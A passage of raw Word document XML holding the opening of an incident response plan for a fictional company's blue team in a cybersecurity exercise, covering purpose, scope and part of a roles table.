        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C13FEC" w14:textId="77777777" w:rsidR="009D5C34" w:rsidRPr="001A26B4" w:rsidRDefault="009D5C34" w:rsidP="00870D5F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB5B2B5" w14:textId="77777777" w:rsidR="00870D5F" w:rsidRPr="001A26B4" w:rsidRDefault="00870D5F" w:rsidP="00870D5F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE534C7" w14:textId="77777777" w:rsidR="009A0F43" w:rsidRDefault="009A0F43">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="009A0F43" w:rsidSect="00964D12">
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CD38D78" w14:textId="1D267FE0" w:rsidR="00870D5F" w:rsidRDefault="00870D5F">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FE97434" w14:textId="2DF26259" w:rsidR="00870D5F" w:rsidRDefault="004166B0" w:rsidP="00870D5F">
      <w:pPr>
        <w:pStyle w:val="Appendicesheading"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc163900527"/>
      <w:r>
        <w:t xml:space="preserve">Appendix C - </w:t>
      </w:r>
      <w:r w:rsidR="00870D5F">
        <w:t>Incident Response Plan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="5AD85F32" w14:textId="4127C79A" w:rsidR="00140957" w:rsidRDefault="00140957" w:rsidP="00E674B5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc163900528"/>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="496181A7" w14:textId="3AC9AB51" w:rsidR="00140957" w:rsidRDefault="00140957" w:rsidP="00140957">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc163900529"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Purpose</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="48AB55BF" w14:textId="21B58324" w:rsidR="00140957" w:rsidRDefault="007A57DB" w:rsidP="00140957">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD5460">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This Incident Response Plan (IRP) is designed to steer eHarbor Company's blue team through the process of managing cybersecurity incidents during exercises, emphasizing thorough analysis and clear communication. The plan mandates that no containment or eradication actions are taken without detailed investigation and explicit approval from the white team. This ensures that all responses are carefully considered and authorized, aligning with the exercise's objectives to enhance learning and improve cybersecurity posture without premature hardening or alterations to the environment.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564BEE96" w14:textId="55136DC1" w:rsidR="007A57DB" w:rsidRDefault="007A57DB" w:rsidP="007A57DB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc163900530"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="1CAFA984" w14:textId="54262EA0" w:rsidR="00A3650F" w:rsidRPr="00FD5460" w:rsidRDefault="00A3650F" w:rsidP="00A3650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD5460">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This Incident Response Plan (IRP) applies to all information systems, networks, and data managed by eHarbor Company. It encompasses incidents that may impact the confidentiality, integrity, or availability of company assets, including but not limited to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A06E201" w14:textId="77777777" w:rsidR="00A3650F" w:rsidRPr="00A3650F" w:rsidRDefault="00A3650F" w:rsidP="00E674B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3650F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cyberattacks (e.g., malware, ransomware, phishing, DDoS attacks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15190AEB" w14:textId="77777777" w:rsidR="00A3650F" w:rsidRPr="00A3650F" w:rsidRDefault="00A3650F" w:rsidP="00E674B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3650F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Security breaches (e.g., unauthorized access, data exfiltration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC4A8F1" w14:textId="77777777" w:rsidR="00A3650F" w:rsidRPr="00A3650F" w:rsidRDefault="00A3650F" w:rsidP="00E674B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3650F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Insider threats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F922202" w14:textId="77777777" w:rsidR="00A3650F" w:rsidRPr="00A3650F" w:rsidRDefault="00A3650F" w:rsidP="00E674B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3650F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Loss or digital assets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442F7554" w14:textId="77777777" w:rsidR="00A3650F" w:rsidRDefault="00A3650F" w:rsidP="00A3650F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3328"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14F88020" w14:textId="4BBA806F" w:rsidR="00A3650F" w:rsidRPr="00FD5460" w:rsidRDefault="00A3650F" w:rsidP="00A3650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Furthermore, the IRP includes a separate process for handling s</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12B4B">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ocial incidents (e.g., “bad press”, false statements)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12B4B">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783B4A98" w14:textId="3D9F4830" w:rsidR="00A3650F" w:rsidRPr="00A3650F" w:rsidRDefault="00A3650F" w:rsidP="00A3650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD5460">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The IRP is designed for the blue team's use during cybersecurity exercises, guiding their response to simulated incidents under the constraints set by the exercise rules. Specifically, the plan covers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A9AD2C" w14:textId="77777777" w:rsidR="00A3650F" w:rsidRPr="00FD5460" w:rsidRDefault="00A3650F" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD5460">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The initial detection and reporting of security incidents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29651F84" w14:textId="77777777" w:rsidR="00A3650F" w:rsidRPr="00FD5460" w:rsidRDefault="00A3650F" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD5460">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Conducting a thorough analysis to understand the incident's impact and root cause.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2776DD14" w14:textId="77777777" w:rsidR="00A3650F" w:rsidRPr="00174B48" w:rsidRDefault="00A3650F" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD5460">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Communication protocols, including reporting to and obtaining approval from the white team before proceeding with containment and eradication measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160BFEBE" w14:textId="77777777" w:rsidR="00A3650F" w:rsidRDefault="00A3650F" w:rsidP="00A3650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65387485" w14:textId="77777777" w:rsidR="00A3650F" w:rsidRDefault="00A3650F" w:rsidP="00A3650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">More detailed communication procedures are out of scope of this plan. These are introduced in detail as a part of the Communication Plan. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A81900A" w14:textId="31856DA2" w:rsidR="00A3650F" w:rsidRDefault="00A3650F" w:rsidP="00A3650F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc163900531"/>
      <w:r>
        <w:t>Roles and responsibilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="62240200" w14:textId="77777777" w:rsidR="00836A67" w:rsidRDefault="00836A67" w:rsidP="00836A67">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This section focuses on the incident response related roles and responsibilities. The business roles of eHarbor are introduced in a separate document. Table 1 describes the roles and responsibilities of eHarbor. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-113" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="45B0E1"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="45B0E1"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="45B0E1"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="45B0E1"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="45B0E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="45B0E1"/>
        </w:tblBorders>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2303"/>
        <w:gridCol w:w="2376"/>
        <w:gridCol w:w="2341"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w14:paraId="1A7F5D06" w14:textId="77777777" w:rsidTr="007B1F3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2303" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="156082"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="156082"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="156082"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="156082"/>
          </w:tcPr>
          <w:p w14:paraId="739A91FF" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Alter ego</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="156082"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="156082"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="156082"/>
          </w:tcPr>
          <w:p w14:paraId="0BDFE019" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Exercise responsibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="156082"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="156082"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="156082"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="156082"/>
          </w:tcPr>
          <w:p w14:paraId="26A4C752" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Services / Servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w14:paraId="2EDAB36D" w14:textId="77777777" w:rsidTr="007B1F3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2303" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
          </w:tcPr>
          <w:p w14:paraId="2320668E" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Jari Litmanen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
          </w:tcPr>
          <w:p w14:paraId="2D0B11FB" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Incident logging, rocket.chat, MISP, social media</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
          </w:tcPr>
          <w:p w14:paraId="1CBD8D19" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Firewalls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w14:paraId="35393D30" w14:textId="77777777" w:rsidTr="007B1F3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2303" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1722310B" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Jasso Laamanen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15C041AC" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
